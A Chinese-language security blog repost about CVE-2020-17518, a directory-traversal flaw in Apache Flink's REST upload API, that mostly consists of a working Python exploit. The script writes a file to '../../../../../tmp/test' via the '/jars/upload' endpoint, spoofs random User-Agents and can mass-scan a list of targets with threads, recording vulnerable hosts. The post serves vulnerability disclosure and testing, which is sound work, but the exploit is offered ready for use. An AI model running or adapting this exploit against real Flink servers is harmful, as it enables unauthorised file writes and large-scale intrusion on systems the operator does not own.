Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

  • A+
所属分类:安全文章
Apache Flink目录遍历漏洞,可通过REST API读/写远程文件
进攻编号:
CVE-2020-17518


突破描述:
CVE-2020-17518:通过REST API写入远程文件


侵害的版本:
Flink 1.5.1-1.11.2


安全版本:
Flink 1.11.3或Flink 1.12.0


Flink 1.5.1发布了REST API,可通过恶意修改的HTTP HEADER,将任意文件复制到文件系统的任意位置。


用法:
狭窄:python CVE-2020-17518.py -u http:// IP:port

批量:python CVE-2020-17518.py -f url.txt


#-*- coding:utf-8 -*-banner = """        888888ba             dP                             88    `8b            88                            a88aaaa8P' .d8888b. d8888P .d8888b. dP    dP         88   `8b. 88'  `88   88   Y8ooooo. 88    88         88    .88 88.  .88   88         88 88.  .88         88888888P `88888P8   dP   `88888P' `88888P'    ooooooooooooooooooooooooooooooooooooooooooooooooooooo                 @time:2021/01/06 CVE-2020-17518.py                C0de by NebulabdSec - @batsu                   """print(banner)import threadpoolimport randomimport requestsimport argparseimport http.clientimport urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)http.client.HTTPConnection._http_vsn = 10http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
payload_CMD = '''test'''TARGET_URI = "/jars/upload'%2bsss"
def get_ua(): first_num = random.randint(55, 62) third_num = random.randint(0, 3200) fourth_num = random.randint(0, 140) os_type = [ '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)', '(Macintosh; Intel Mac OS X 10_12_6)' ] chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] ) return ua
def CVE_2020_17518(url): proxies = {"http":"http://127.0.0.1:8080"} # proxies = {"scoks5": "http://127.0.0.1:1081"} paramsMultipart = [('jarfile', ('../../../../../tmp/test', "{}rn".format(payload_CMD), 'application/octet-stream'))]
headers = { 'User-Agent': get_ua(), "Accept": "*/*" } targetUrl = url + TARGET_URI try: res = requests.post(targetUrl, files=paramsMultipart, headers=headers, timeout=15, verify=False, proxies=proxies) # proxies={'socks5': 'http://127.0.0.1:1081'}) if len(res.text) == 25 and "Not found" in res.text and "errors" in res.text: print("[+] URL:{}--------可能存在CVE-2020-17518漏洞".format(url)) with open("存在漏洞地址.txt", 'a') as fw: fw.write(url + 'n') else: print("[-] " + url + " 没有发现CVE-2020-17518漏洞.n") except Exception as e: print(e) except: print("[-] " + url + " Request ERROR.n")
def multithreading(filename="ip.txt", pools=5): works = [] with open(filename, "r") as f: for i in f: func_params = [i.rstrip("n")] works.append((func_params, None)) pool = threadpool.ThreadPool(pools) reqs = threadpool.makeRequests(CVE_2020_17518, works) [pool.putRequest(req) for req in reqs] pool.wait()
def main(): print("默认上传文件名为../../../../../tmp/test,内容为'''test'''") parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port") parser.add_argument("-f", "--file", help="Url File; Example:url.txt") args = parser.parse_args() url = args.url file_path = args.file if url != None and file_path ==None: CVE_2020_17518(url) elif url == None and file_path != None: multithreading(file_path, 10) # 默认15线程
if __name__ == "__main__": main()



项目地址:https://github.com/QmF0c3UK/CVE-2020-17518

Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

本文始发于微信公众号(Ots安全):Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: